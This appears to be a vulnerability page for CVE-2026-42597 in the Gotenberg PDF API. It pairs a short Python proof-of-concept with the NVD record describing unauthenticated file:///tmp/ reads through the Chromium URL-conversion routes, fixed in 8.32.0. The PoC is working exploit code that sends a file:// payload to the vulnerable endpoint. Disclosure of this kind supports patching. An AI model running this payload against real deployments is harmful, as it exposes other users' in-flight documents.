CVE-2026-42597

import requests def exploit_poc(target_host): """ PoC for CVE-2026-42597 Demonstrates reading a file from /tmp/ using the vulnerable URL route. """ # The vulnerable endpoint for URL conversion endpoint = f"{target_host}/forms/chromium/convert/url" # Malicious payload pointing to a file in /tmp/ # In a real attack, the attacker would guess the specific working directory # or enumerate files in /tmp/ data = { "url": "file:///tmp/sensitive_source_file.html" } try: print(f"[*] Sending request to {endpoint}...") response = requests.post(endpoint, data=data) if response.status_code == 200: print("[+] Request successful. The file content might be in the response/PDF.") print(f"[+] Response length: {len(response.content)} bytes") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": # Example usage target = "http://localhost:3000" exploit_poc(target)

{"cve": {"id": "CVE-2026-42597", "sourceIdentifier": "[email protected]", "published": "2026-05-14T16:16:23.037", "lastModified": "2026-05-14T18:16:48.200", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Gotenberg is a Docker-powered stateless API for PDF files. Prior to 8.32.0, the /forms/chromium/convert/url and /forms/chromium/screenshot/url routes accept url=file:///tmp/... from anonymous callers. The default Chromium deny-list intentionally exempts file:///tmp/ so HTML/Markdown routes can load their own request-local assets, and those routes apply a per-request AllowedFilePrefixes guard to scope the read. The URL routes never set AllowedFilePrefixes, so the scope guard silently skips. Alice enumerates /tmp/, walks Gotenberg's per-request working directories, and reads the raw source files of other in-flight conversions as rendered PDF output. This vulnerability is fixed in 8.32.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-73"}, {"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-g924-cjx7-2rjw", "source": "[email protected]"}, {"url": "https://github.com/gotenberg/gotenberg/security/advisories/GHSA-g924-cjx7-2rjw", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}